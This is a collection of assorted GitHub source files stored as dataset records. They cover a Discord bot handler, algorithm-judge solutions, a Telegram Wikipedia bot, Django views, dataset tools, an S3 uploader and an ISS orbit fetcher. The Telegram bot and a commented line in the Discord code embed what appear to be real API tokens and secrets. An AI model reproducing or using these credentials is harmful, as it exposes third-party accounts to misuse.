param:\n param['ping'] = set()\n param['ping'].add(v[-1])\n else:\n param[v[0]] = v[-1] or None\n param['ping'] = '|'.join(param.get('ping', ())) or None\n params.append(param)\n otherparams['guild_id'] = guild.id\n if set(param['channel_id'] for param in params) \\\n - set(channel.id for channel in guild.channels): # is not empty\n raise web.HTTPBadRequest\n try:\n with self.db.connection:\n self.db.executemany(\n 'UPDATE channels SET lang=:lang, games_ping=:ping \\\nWHERE channel_id=:channel_id',\n params\n )\n self.db.execute(\n 'UPDATE guilds SET guild_disabled_commands=:disable_cmd, \\\nguild_disabled_cogs=:disable_cog, words_censor=:words_censor WHERE guild_id=:guild_id',\n otherparams\n )\n except sql.ProgrammingError as exc:\n raise web.HTTPBadRequest(reason=str(exc))\n raise web.HTTPSeeOther(request.path)\n\n async def file(self, request):\n path = request.match_info.get('name', '.html') or '.html'\n fullpath = self.fil(path)\n if os.path.isfile(fullpath):\n with 
open(fullpath, 'rb') as f:\n #self.logger.info('Request serving: {}'.format(path), extra={'ctx': self.dtx})\n return web.Response(\n status=200,\n body=f.read(),\n content_type=mimetypes.guess_type(fullpath)[0]\n )\n else:\n #self.logger.error('Request not served, 404: {}'.format(path), extra={'ctx': self.dtx})\n self.notfound()\n\n#Handler(None, None, None, 512581527343726592, 't5jgg5udqQrdiJe_bKHrn0VrEDMztpZ7').run_sync()\n","repo_name":"Kenny2github/kenny2automate","sub_path":"kenny2automate/server/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":22667,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"69"}
+{"seq_id":"13715894894","text":"import sys\n\ninput = sys.stdin.readline\n\nN, M, K = map(int, input().split())\npower_plants = set(map(int, input().split()))\ncabels = [[] for _ in range(M)]\nfor i in range(M):\n u, v, w = map(int, input().split())\n cabels[i] = (w, u, v)\ncabels.sort()\nparent = [i for i in range(N + 1)]\n\n\ndef find_parent(v):\n if parent[v] == v:\n return v\n parent[v] = find_parent(parent[v])\n return parent[v]\n\n\ndef can_union(v1, v2):\n pv1 = find_parent(v1)\n pv2 = find_parent(v2)\n if pv1 in power_plants and pv2 in power_plants:\n return False\n elif pv1 in power_plants:\n parent[pv2] = pv1\n elif pv2 in power_plants:\n parent[pv1] = pv2\n else:\n if pv1 == pv2:\n return False\n elif pv1 > pv2:\n parent[pv1] = pv2\n else:\n parent[pv2] = pv1\n return True\n\n\nans = 0\ncnt = 0\nfor w, u, v in cabels:\n if can_union(u, v):\n ans += w\n cnt += 1\n if cnt == N - K:\n break\nprint(ans)\n","repo_name":"nnoobbaagguu/Algorithm","sub_path":"Baekjoon Online Judge/10423.py","file_name":"10423.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"1179370472","text":"import numpy as np\n\n\ndef count_nonzero(X, axis=None, sample_weight=None):\n if axis == -1:\n axis = 1\n elif axis == -2:\n axis = 0\n elif X.format != 'csr':\n raise TypeError('Expected CSR sparse format')\n if axis is None:\n if sample_weight is None:\n return X.nnz\n else:\n return np.dot(np.diff(X.indptr), sample_weight)\n elif axis == 1:\n out = np.diff(X.indptr)\n if sample_weight is None:\n return out\n return out * sample_weight\n elif axis == 0:\n if sample_weight is None:\n return np.bincount(X.indices, minlength=X.shape[1])\n else:\n weights = np.repeat(sample_weight, np.diff(X.indptr))\n return np.bincount(\n X.indices, minlength=X.shape[1], weights=weights)\n else:\n raise ValueError('Unsupported')\n","repo_name":"luoshao23/ML_algorithm","sub_path":"luolearn/utils/sparsefuncs.py","file_name":"sparsefuncs.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"69"}
+{"seq_id":"69850614619","text":"import argparse\nimport logging\n\nimport numpy as np\nimport random\nimport torch\nimport torch.optim as O\n\nfrom datasets import get_dataset, get_testset, get_dataset_configurations\nfrom models import get_model\nfrom runners import Runner\nfrom xml.dom import minidom\n\n\ndef _prepare_batch(batch):\n x, y = batch, batch.relatedness_score\n return x, y\n\ndef _write_xml(filename, pred):\n \"\"\"Docstring.\"\"\"\n with open(filename, encoding='utf8') as fp:\n xml = minidom.parse(fp)\n print('Iniciou XML')\n pairs = xml.getElementsByTagName('pair')\n for pair in pairs:\n # print('pred: ', pred)\n sim = str(pred[pairs.index(pair)]).split(',')\n similarity = sim[0].replace('tensor(', '')\n # print('similarity: ', similarity)\n # print('pairs.index: ', pairs.index(pair))\n # print('pair: ', str(pred[pairs.index(pair)]))\n pair.setAttribute('similarity', similarity)\n with open(filename, 'w', encoding='utf8') as fp:\n fp.write(xml.toxml())\n print('XML escrito')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Sentence similarity model')\n parser.add_argument('--model', default='bimpm', choices=['bimpm'], help='Model to use')\n parser.add_argument('--dataset', default='assin', choices=['assin'], help='Dataset to use')\n parser.add_argument('--batch-size', type=int, default=64, help='Batch size')\n parser.add_argument('--epochs', type=int, default=15, help='Number of epochs')\n parser.add_argument('--lr', type=float, default=2e-4, help='Learning rate')\n parser.add_argument('--regularization', type=float, default=3e-4, help='Regularization')\n parser.add_argument('--seed', type=int, default=1234, help='Seed for reproducibility')\n parser.add_argument('--device', type=int, default=0, help='Device, -1 for CPU')\n parser.add_argument('--log-interval', type=int, default=50, help='Device, -1 for CPU')\n\n args = parser.parse_args()\n random.seed(args.seed)\n np.random.seed(args.seed)\n torch.manual_seed(args.seed)\n if args.device != -1:\n torch.cuda.manual_seed(args.seed)\n\n logger = logging.getLogger(__name__)\n logger.setLevel(logging.INFO)\n ch = logging.StreamHandler()\n ch.setLevel(logging.DEBUG)\n formatter = logging.Formatter('%(levelname)s - %(message)s')\n ch.setFormatter(formatter)\n logger.addHandler(ch)\n\n dataset_cls, train_loader, dev_loader, test_loader, embedding = get_dataset(args)\n model = get_model(args, dataset_cls, embedding)\n\n total_params = 0\n for param in model.parameters():\n size = [s for s in param.size()]\n total_params += np.prod(size)\n logger.info('Total number of parameters: %s', total_params)\n\n loss_fn, metrics, y_to_score, resolved_pred_to_score = get_dataset_configurations(args)\n\n optimizer = O.Adam(filter(lambda p: p.requires_grad, model.parameters()), lr=args.lr, weight_decay=args.regularization)\n runner = Runner(model, loss_fn, metrics, optimizer, y_to_score, resolved_pred_to_score, args.device, None)\n runner.run(args.epochs, train_loader, dev_loader, test_loader, args.log_interval)\n print('terminou tudo')\n '''\n dataset_cls, train_loader, dev_loader, test_loader, embedding = get_dataset(args)\n print(test_loader)\n checkpoint = torch.load('9dc095f1-8cb9-4041-a661-8188b008df27.model')\n print('checkpoint')\n model.load_state_dict(checkpoint['state_dict'])\n print('load_state_dict')\n model.eval()\n print('eval')\n x = test_loader\n print('test_loader')\n y_pred = model(test_loader)\n _write_xml('/home/jessica/teste-bimpm/data/assin/output.xml', y_pred)\n 
'''\n","repo_name":"jehrodrigues/biMPM-ASSIN2","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3655,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"31288085736","text":"import re\nfrom datetime import datetime\n\nimport pdfminer.high_level\n\nimport categories\nfrom mail_api.abstract_mail_api import AbstractAttachment\nfrom message_handler import MessageHandler\nfrom utils import temporary_locale\n\n\nclass MusicStoreMessageHandler(MessageHandler):\n def get_type(self):\n return categories.COMPUTER_HARDWARE\n\n def get_query_params(self):\n return {\n self.SUBJECT: \"MUSICSTORE Your Music Store sales invoice\",\n self.SENDER: \"export@musicstore.com\",\n }\n\n def extract_txt(self, pdffile: str):\n with temporary_locale(\"en_US\"):\n text: str = pdfminer.high_level.extract_text(pdffile)\n purchase_date: str = re.search(r\"\\b(\\d\\d\\.\\d\\d.\\d\\d\\d\\d)\\b\", text)[0]\n self.purchase_date = datetime.strptime(purchase_date, \"%d.%m.%Y\")\n self.amount = float(\n re.search(r\"Total CHF inkl. MwSt\\D+(\\d+,\\d+)\", text)[1].replace(\n \",\", \".\"\n )\n )\n\n def handle_attachment(self, attachment: AbstractAttachment):\n if re.search(r\"Return-Form\", attachment.get_filename()):\n return True\n pdffile: str = self.save(attachment)\n self.filename = attachment.get_filename()\n self.extract_txt(pdffile)\n","repo_name":"bwagner/gi","sub_path":"plugins/music_store_message_handler.py","file_name":"music_store_message_handler.py","file_ext":"py","file_size_in_byte":1289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"20178783856","text":"\"\"\"Swaps the x and y coordinates of a Pascal VOC xml formatted dataset file\nArguments:\npath -- Path to the dataset file to be converted\noutput -- Path to save the coordinate swapped dataset file\n\"\"\"\n\nimport argparse\nimport logging\nimport sys\nimport xml.etree.ElementTree as ET\n\nlogging.basicConfig(\n level=logging.INFO, format=\"[%(levelname)s] %(asctime)s: %(message)s\", filemode=\"a\"\n)\n\nlogger = logging.getLogger()\n\nparser = argparse.ArgumentParser(\n description=\"Script for deleting all instances of a particular class name from a Pascal VOC formatted dataset file\"\n)\nparser.add_argument(\n \"--input\", \"-i\", type=str, required=True, help=\"Path to the dataset file to be changed\"\n)\nparser.add_argument(\n \"--output\", \"-o\", type=str, required=False, help=\"Path to save the new dataset file\"\n)\nparser.add_arugment(\n \"--classname\", \"-n\", required=True, help=\"Class name to be deleted from the dataset file\"\n)\n\narguments = parser.parse_args()\ninput_path = arguments.input\nclass_name = arguments.classname\nif arguments.output:\n output_path = arguments.output\nelse:\n output_path = input_path\n\nlogger.info(f\"======== Delete VOC Class ========\")\nlogger.info(f\"Input File Path: {input_path}\")\nlogger.info(f\"Output File Path: {output_path}\")\nlogger.info(f\"Class name: {class_name}\")\n\ntree = ET\ntry:\n tree = ET.parse(input_path)\nexcept Exception as e:\n logger.fatal(f\"Unable to read {input_path}. File is not xml or does not exist\")\n logger.error(e)\n sys.exit(1)\n\nroot = tree.getroot()\nfor label in root.findall(\"object\"):\n bbox = label.find(\"bndbox\")\n type = label.find(\"name\").text\n deleted = False\n if type == class_name:\n root.delete(label)\n deleted = True\n\n logger.debug(f\"Type: {type}\")\n logger.debug(f\"Deleted: {deleted}\")\n\n\ntry:\n tree.write(output_path)\nexcept Exception as e:\n logger.error(f\"Unable to write to {output_path}\")\n logger.error(e)\n sys.exit(1)\n","repo_name":"spencervoiss/dataset_utils","sub_path":"voc_delete_class.py","file_name":"voc_delete_class.py","file_ext":"py","file_size_in_byte":1931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"5999643291","text":"from faker import Faker\nimport random\nimport mysql.connector\n\n# Conectando ao banco de dados\nconn = mysql.connector.connect(\n host='localhost',\n user='root',\n password='password',\n database='flask2k'\n)\n\ncursor = conn.cursor()\n\nfake = Faker()\n\nfor _ in range(2000):\n nome = fake.name()\n idade = random.randint(1, 100)\n genero = random.choice(['Masculino', 'Feminino', 'Outro'])\n endereco = fake.address()\n cidade = fake.city()\n estado = fake.state_abbr()\n telefone = fake.phone_number()\n email = fake.email()\n data_admissao = fake.date_this_year()\n data_alta = fake.date_this_year()\n diagnostico = fake.sentence()\n tratamento = fake.text()\n observacoes = fake.text()\n try:\n\n cursor.execute('''INSERT INTO pacientes \n (nome, idade, genero, endereco, cidade, estado, telefone, email, \n data_admissao, data_alta, diagnostico, tratamento, observacoes) \n VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)''',\n (nome, idade, genero, endereco, cidade, estado, telefone, email,\n data_admissao, data_alta, diagnostico, tratamento, observacoes))\n\n except Exception as e:\n print(\"Não foi possível inserir os dados!\\n{}\".format(e))\n\nconn.commit()\ncursor.close()\nconn.close()\n\nprint(\"Dados inseridos com sucesso!\")\n","repo_name":"LeoVeig4/CRUD-Hospital","sub_path":"popular_banco.py","file_name":"popular_banco.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"11918512215","text":"import telebot\r\nfrom telebot import types\r\nimport wikipedia\r\nfrom googletrans import Translator\r\nimport time\r\nimport requests\r\n\r\n#token va modullarni cahqirish uchun\r\nadmin_id='-1001261577807'\r\napikey='-jgjTI4nQgb-UebbeCNF3unEFqaMyOAkDi_ZMBmlQIA'\r\nTOKEN=\"1546844166:AAF77WzEduNI6hIu-TgHkHYz8fBW-V83Vu8\"\r\nbot = telebot.TeleBot(TOKEN, parse_mode='HTML') # parse mode Html uchun ham o'tishi mumkin\r\ntranslator = Translator()\r\n\r\n#telegram keyboard uchun\r\nmarkup_inline=types.InlineKeyboardMarkup()\r\nitem_uz=types.InlineKeyboardButton(text='Uzbekcha 🇺🇿',callback_data='uz')\r\nitem_ru=types.InlineKeyboardButton(text='русский 🇷🇺',callback_data='ru')\r\nitem_report_problem=types.InlineKeyboardButton(text='❌Report❌',callback_data='report_problem')\r\nmarkup_inline.add(item_uz,item_ru,item_report_problem)\r\n\r\n#report problem uchun buttonlar\r\nmarkup_inline2=types.InlineKeyboardMarkup()\r\nitem_1=types.InlineKeyboardButton(text=\"Xato ma'lumot\",callback_data='report1')\r\nitem_2=types.InlineKeyboardButton(text=\"Error 404\",callback_data='report2')\r\nitem_3=types.InlineKeyboardButton(text=\"Rasm error\",callback_data='report3')\r\nmarkup_inline2.add(item_1,item_2,item_3)\r\n\r\n#botni boshlash funksiyasi\r\n@bot.message_handler(commands=['start'])\r\ndef send_welcome(message):\r\n global name\r\n global id\r\n name = message.from_user.first_name\r\n id=message.from_user.id\r\n print(name, id)\r\n bot.reply_to(message, '''Salom {}, bizning wikipedia_uz botiga xush kelibsiz. \r\n Wikipedia so'rovlarini jo'natishingiz mumkin.\r\n Masalan: Apple/Warsaw/Uzbekistan\r\n '''.format(name))\r\n bot.send_message(chat_id=admin_id,text='{} -botga kirdi!'.format(name))\r\n #reklama uchun funksiya 15 minut va 50 soatda jonatadi\r\n #bu funskiya xozir ishlamayapti \r\n #reklama jonatish funksiyasi\r\n\r\n@bot.message_handler(commands=['about'])\r\ndef send_about(message):\r\n bot.send_message(message.chat.id,'''\r\n Botimiz xaqida:\r\nMasalan:\r\n✅ Yangilangan sanasi- 08/02/2021\r\n✅ Dasturchi- @husanboy_us\r\n✅ Xamkorlik uchun - @husanboy_us\r\n✅ Bizning kanalimiz https://t.me/artofitt\r\n ''' )\r\n\r\n#asosiy funksiya yoki funskiyalar\r\n@bot.message_handler(func=lambda message: True)\r\ndef main_func(message):\r\n global get_wiki\r\n try:\r\n msg=message.text\r\n get_wiki=wikipedia.summary(msg, sentences=7)\r\n get_wiki_pics=wikipedia.page(msg).images[0]\r\n bot.send_message(message.chat.id,get_wiki,reply_markup=markup_inline )\r\n bot.send_photo(message.chat.id, photo=get_wiki_pics)\r\n except Exception :\r\n bot.send_message(message.chat.id, text=\"Nimadur xatolik yuz berdi. Aniq javob olshingiz uchun aniq so'rov kiriting 👇👇👇\")\r\n bot.send_message(message.chat.id,'''\r\n So'rovni Ingliz Tilida yozishni yoki tekshirishni unutmang!\r\nMasalan:\r\nTrump-❌❌❌ Donald Trump-✅✅✅\r\n ''' )\r\n \r\n#function gets inline data and translates to the given languages\r\n@bot.callback_query_handler(func=lambda call: True)\r\ndef query_text(call):\r\n global name\r\n global id\r\n if call.data=='uz':\r\n translation = translator.translate(get_wiki, dest='uz',)\r\n data_uz=translation.text\r\n bot.send_message(call.message.chat.id, data_uz) \r\n elif call.data=='ru':\r\n translation = translator.translate(get_wiki, dest='ru',)\r\n data_ru=translation.text\r\n bot.send_message(call.message.chat.id,data_ru)\r\n elif call.data=='report_problem':\r\n bot.send_message(call.message.chat.id, text=' 🔻🔻🔻 Xato turini tanlang! 
🔻🔻🔻 ',reply_markup=markup_inline2)\r\n elif call.data=='report1':\r\n global name\r\n global id\r\n print('hello report 1')\r\n bot.send_message(call.message.chat.id,text='Xatolik Botimiz Adminiga yetib bordi! Tez orada kamchilik tuzatiladi!')\r\n bot.send_message(chat_id=admin_id,text=\" Name: {} ID: {} -Reported code 1\".format(name,id))\r\n \r\n elif call.data=='report2':\r\n print('hello report 2')\r\n bot.send_message(call.message.chat.id,text='Xatolik Botimiz Adminiga yetib bordi! Tez orada kamchilik tuzatiladi!')\r\n bot.send_message(chat_id=admin_id,text=\" Name: {} ID: {} -Reported code 2\".format(name,id))\r\n \r\n bot.send_message(call.message.chat.id,text='Xatolik Botimiz Adminiga yetib bordi! Tez orada kamchilik tuzatiladi!')\r\n elif call.data=='report3':\r\n print('hello report 3')\r\n bot.send_message(call.message.chat.id,text='Xatolik Botimiz Adminiga yetib bordi! Tez orada kamchilik tuzatiladi!')\r\n bot.send_message(chat_id=admin_id,text=\" Name: {} ID: {} -Reported code 3\".format(name,id))\r\n \r\n else:\r\n print('Not working query_text funskiyasida')\r\n\r\n\r\nbot.polling() \r\n#translation = translator.translate(result, dest='uz',)\r\n#bot.reply_to(message,translation,parse_mode=None)\r\n","repo_name":"HusanboyUs/wikipedia_telegram_bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"7644258234","text":"import sys\nip = sys.stdin.readline\n\nn = int(ip())\npi = sorted(list(map(int, ip().split())))\n\nres = 0\nfor i in range(n):\n res += (pi[i] * (n-i))\nprint(res)\n\n''' ATM\nATM 앞에 N명의 사람들이 줄서있다. \n사람들은 1 ~ N 번 까지 번호 매겨짐. i 번 사람이 돈을 인출하는데 걸리는 시간은 Pi분\n\n줄을 서는 순서에 따라서 인출하는데 필요한 시간의 합이 달라진다고? 그렇네\n1 2 3 4 5로 서면\n1\n1 2\n1 2 3\n1 2 3 4\n1 2 3 4 5\n\n이렇게 시간이 소요되니까\n암튼 총합 시간이 가장 작아지게 해라\n\n- 입력 -\n첫 줄에 사람 수 N, 둘째 줄에 각각 시간\n\n시간 1초 메모리 256MB\n\n--1트--: 이게 C3 문제야?\n그냥 뇌 비우고 생각하면 오름차순 정렬해서 사람 수 역순으로 곱해서 더해주면 되는거 아니냐?\n'''","repo_name":"NonokEE/Coding_study","sub_path":"BaekJoon Silver/S4_11399.py","file_name":"S4_11399.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"7678797710","text":"from datetime import date, timedelta\n\nfrom django.core.management.base import BaseCommand\nfrom django.db.models.base import ObjectDoesNotExist\nfrom factory.fuzzy import FuzzyInteger, FuzzyNaiveDateTime\n\nfrom ...models import Category, Unit, User\nfrom ...tests.factories import SubstanceFactory\n\nimport datetime\n\n\nclass Command(BaseCommand):\n args = ' '\n help = 'Populate substance table with random dummy data.'\n\n def add_arguments(self, parser):\n parser.add_argument('username')\n parser.add_argument('upper_bound')\n parser.add_argument('substance_type')\n parser.add_argument('substance_unit')\n\n def handle(self, *args, **options):\n upper_bound = options['upper_bound']\n substance_type = options['substance_type']\n substance_unit = options['substance_unit']\n username = options['username']\n\n try:\n user = User.objects.get(name=username.lower())\n except ObjectDoesNotExist:\n user = User.objects.create(name=username.lower())\n\n try:\n category = Category.objects.get(name=substance_type.lower())\n except ObjectDoesNotExist:\n category = Category.objects.create(name=substance_type.lower())\n\n try:\n unit = Unit.objects.get(name=substance_unit.lower())\n except ObjectDoesNotExist:\n unit = Unit.objects.create(name=substance_unit.lower(), category=category)\n\n\n end_date = date.today()\n start_date = end_date - timedelta(days=7)\n for i in self.get_date_list(start_date, end_date):\n for _ in range(3):\n SubstanceFactory(\n user=user,\n unit=unit,\n category=category,\n record_date=i,\n record_time=FuzzyNaiveDateTime(datetime.datetime.now() - timedelta(hours=24)),\n value = FuzzyInteger(0, int(upper_bound))\n )\n\n def get_date_list(cls, start, end):\n delta = end - start\n return [(start + timedelta(days=i)) for i in range(delta.days+1)]\n","repo_name":"budiryan/urinalysis-app","sub_path":"backend/management/commands/load_random_substance_data.py","file_name":"load_random_substance_data.py","file_ext":"py","file_size_in_byte":2130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"42872664959","text":"from django.shortcuts import render\nfrom django.template import RequestContext\nfrom django.shortcuts import render_to_response\n\n# Create your views here.\nfrom django.http import HttpResponse\nfrom mysite2.baiduparser import BaiduPage\nfrom mysite2.datamgr import *\n\ndef index(request):\n names = {'wd':'app'}\n return render_to_response('index.html',names,context_instance=RequestContext(request))\n\ndef search(request):\n wd = request.GET['wd']\n #bdChecked = request.GET['baidu']\n p = BaiduPage()\n p.parse(wd)\n resultitems = p.getSiteItems()\n #resultitems = [{'title':'site1','desc':'site1 desc','url':'aa.com','pr':7,'baidurank':3,'alexa':133},\n # {'title':'sit2','desc':'site2 desc','url':'bb.com','pr':17,'baidurank':33,'alexa':1233}]\n searchpages = []\n for i in range(1,11):\n url = \"s/?wd=\" + wd\n url = \"%s&pn=%d\"%(url,i)\n searchpages.append({'name':i,'url':url})\n dict = {'wd':wd,'resultitems':resultitems,'searchpages':searchpages}\n return render_to_response('list.html',dict,context_instance=RequestContext(request))\n\ndef ajax(request):\n siteUrl = request.GET['siteUrl']\n siteUrl2 = \"http://\"+siteUrl\n q = request.GET['q']\n str = ''\n if q=='alexa':\n str = '%d'%(g_dataMgr.getAlexa(siteUrl2))\n elif q=='pr':\n str = '%d'%g_dataMgr.getPr(siteUrl)\n elif q=='sum':\n sum = g_dataMgr.getSiteSum(siteUrl2)\n str = sum['title']+\",\"+sum['desc']\n elif q=='baidurank':\n str = '%d'%g_dataMgr.getBaiduRank(siteUrl)\n return HttpResponse(str)","repo_name":"colenhyt/mysite2","sub_path":"mysite2/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"22715104157","text":"import cv2\nimport mediapipe as mp\nimport os\n\nDATASET_DIR = \"../../Datasets/Guns_In_CCTV/VOC/\"\n\n\n\ntrain_files= []\nval_files= []\ntest_files= []\n\ndirs = [\"train\", \"valid\", \"test\"]\ndatas = [[], [] ,[]]\n\nfor i, d in enumerate(dirs):\n for f in os.listdir(DATASET_DIR + d + \"/\"):\n if f[-4:] == \".xml\":\n datas[i].append(d + \"/\" + f[:-4])\n with open(f\"CCTV/{d}.txt\", \"w\") as outfile:\n outfile.write(\"\\n\".join(datas[i]))\n","repo_name":"JoshVStaden/pistol_detection_with_yolo","sub_path":"annotate_dataset.py","file_name":"annotate_dataset.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"38912737533","text":"import policy\nimport traceback\nimport logging\nimport monitoring\nimport itertools\nfrom .policy_registry import GetConfig\n\ndef ApplyPolicies(g):\n config = GetConfig()\n enabled = config.get('enabled', True)\n if enabled is not None and not enabled:\n return\n\n monitoring_db = monitoring.GetDatabase('spinbot')\n\n logging.info('Processing issues, repos')\n for i in itertools.chain(*[g.issues(), g.pull_requests(), g.repos()]):\n for p in policy.Policies():\n if p.applies(i):\n err = None\n try:\n p.apply(g, i)\n except Exception as _err:\n logging.warn('Failure applying {} to {}: {}'.format(\n p, i, traceback.format_exc()\n ))\n err = _err\n\n monitoring_db.write('issues_handled', { 'value': 1 }, tags={\n 'policy': p.id,\n 'error': err\n })\n","repo_name":"askulkarni2/spinnaker","sub_path":"spinbot/policy/executor.py","file_name":"executor.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"69"}
+{"seq_id":"8601042687","text":"import json\nimport os\n\nimport boto3\n\n\n# Helper function to get the extension of a filename.\ndef get_file_ext(path):\n return path.split('.')[-1]\n\n# Filename extension to meme-type map.\ncontent_type = {\n 'html': 'text/html',\n 'css': 'text/css',\n 'js': 'text/javascript',\n 'json': 'application/json',\n 'jpg': 'image/jpeg',\n 'jpeg': 'image/jpeg',\n 'png': 'image/png',\n 'txt': 'text/plain'\n}\n\nkeys = json.load(open('keys.json'))\n\nFILENAME = __file__\nROOT_DIR = os.path.abspath(os.path.dirname(FILENAME))\nOUTPUT_DIR = os.path.join(ROOT_DIR, keys['OUTPUT_DIR_NAME'])\nAWS_ACCESS_KEY_ID = keys['AWS_ACCESS_KEY_ID']\nAWS_SECRET_ACCESS_KEY = keys['AWS_SECRET_ACCESS_KEY']\n\n\ns3 = boto3.resource(\n 's3',\n aws_access_key_id=AWS_ACCESS_KEY_ID,\n aws_secret_access_key=AWS_SECRET_ACCESS_KEY\n)\nbucket = s3.Bucket(keys['AWS_S3_BUCKET_NAME'])\n\n# Clear bucket before uploading.\nbucket.objects.all().delete()\nprint('Cleared bucket')\n\nfor current_dir, dirs, files in os.walk(OUTPUT_DIR):\n for file_ in files:\n # Build path of the file.\n path = os.path.join(current_dir, file_)\n # Build absolute path of the file.\n s3_path = path.replace('{}/'.format(OUTPUT_DIR), '')\n\n with open(path, 'rb') as data:\n # Get mime-type of file.\n try:\n ext = get_file_ext(s3_path)\n mime_type = content_type[ext]\n # Fallback to text/plain meme-type.\n except KeyError:\n mime_type = content_type['txt']\n\n # Upload file to bucket.\n bucket.put_object(Key=s3_path, Body=data, ContentType=mime_type)\n print('Uploaded {}: ({})'.format(s3_path, mime_type))\n","repo_name":"sjbitcode/sangeeta-blog","sub_path":"upload_to_s3.py","file_name":"upload_to_s3.py","file_ext":"py","file_size_in_byte":1700,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"23329252750","text":"# %% Imports\nfrom __future__ import annotations\nimport json\nfrom typing import Iterable, Tuple, SupportsFloat as Numeric\nimport os\nimport requests\nfrom tqdm import tqdm\nimport xarray as xr\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom datetime import datetime\nimport pytz\nimport ephem\nfrom dateutil.parser import parse\n# %%\ndict_dayofweek = ['Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', 'Sun']\ndict_mon = ['', 'Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec']\n\ndef get_raw_tle_from_tstamp(ts: datetime | np.datetime64 | Iterable)->Tuple[datetime, str, str, str] | np.ndarray:\n if isinstance(ts, datetime):\n ts = datetime.utcfromtimestamp(ts.timestamp())\n elif isinstance(ts, np.datetime64):\n ts = datetime.utcfromtimestamp(int(ts)*1e-9)\n elif isinstance(ts, Iterable):\n out = []\n for t in tqdm(ts):\n out.append(get_raw_tle_from_tstamp(t))\n return np.asarray(out).T\n\n dayofweek = dict_dayofweek[ts.weekday()]\n day = ts.day\n mon = dict_mon[ts.month]\n year = ts.year\n hh = ts.hour\n mm = ts.minute\n ss = ts.second\n\n url = f'http://isstracker.com/ajax/fetchTLE.php?date={dayofweek}%2C%20{day}%20{mon}%20{year}%20{hh}%3A{mm}%3A{ss}%20GMT'\n\n content = requests.get(url)\n if content.status_code != 200:\n raise RuntimeError('Response %d'%(content.status_code))\n tledict = json.loads(content.content)\n epoch = tledict['epoch']\n lines = tledict['jsTLE'].replace('\\r', '').split('\\n')\n return (parse(epoch + '+00:00'), lines[0], lines[1], lines[2])\n\n# %%\ndef EpochFromTle(line_1: str) -> datetime:\n t = line_1[18:32] # epoch\n year = int(t[:2]) # first two digits\n if year > 56: # first launch in 57 so 57 is 1957\n year += 1900\n else: # < 56: 56 -> 2056\n year += 2000\n\n yday = int(t[2:5]) # day of year\n fday = float(t[5:]) # fractional day of year\n \n start = pytz.utc.localize(datetime(year, 1, 1)) # first day of the year\n tstamp = start.timestamp()\n tstamp += (yday - 1)*86400 # add seconds spent per day\n tstamp += fday*86400 # fraction of day to seconds\n return datetime.utcfromtimestamp(tstamp)\n# %%\ndef staticvars(**kwargs):\n def decorate(func):\n for key in kwargs:\n setattr(func, key, kwargs[key])\n return func\n return decorate\n\n@staticvars(tledb=None, tlefile='')\ndef ISSTleFromTstamp(ts: datetime, *, database_fname: str = None, allowdownload: bool=True, full_output: bool=False) -> Tuple[str, str] | Tuple[str, str, datetime, bool, int]:\n \"\"\"Get TLE for a given timestamp using ISS TLE database.\n\n Args:\n ts (datetime): Timestamp for evaluation, must be in UTC case of datetime.\n database_fname (str, optional): TLE dataset file (loaded using xarray.load_dataset). The dataset file must contain a timestamp (coordinate) for when the TLE is valid, and data_vars line1 and line2 containing the two TLE lines. Defaults to 'ISS_TLE_DB.nc'.\n allowdownload (bool, optional): Allow download of TLE not found in DB.\n full_output (bool, optional): Return full output (line1, line2, epoch, found, idx). 
Defaults to False.\n\n Raises:\n ValueError: Timestamp must be timezone aware.\n IndexError: Could not find valid TLE in the dataset (allowdownload=False, full_output=False).\n RuntimeError: Could not download valid TLE (allowdownload=True, database does not contain valid epoch).\n\n Returns:\n Tuple[str, str] | Tuple[str, str, datetime, bool, int]: (line1, line2) or (line1, line2, datetime, found, idx) if full_output=True.\n \"\"\"\n if ISSTleFromTstamp.tledb is None or ISSTleFromTstamp.tlefile != database_fname:\n if database_fname is None:\n database_fname = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'ISS_TLE_DB.nc')\n ISSTleFromTstamp.tledb = xr.load_dataset(database_fname)\n ISSTleFromTstamp.tlefile = database_fname\n\n tledb: xr.Dataset = ISSTleFromTstamp.tledb\n\n tle_tstamps = tledb.timestamp.values.astype(int)*1e-9\n lows = np.diff(np.asarray(tle_tstamps < ts.timestamp(), dtype=int))\n\n if np.sum(lows) == 0: # no transitions => not found\n if allowdownload: # download is allowed\n _, _, l1, l2 = 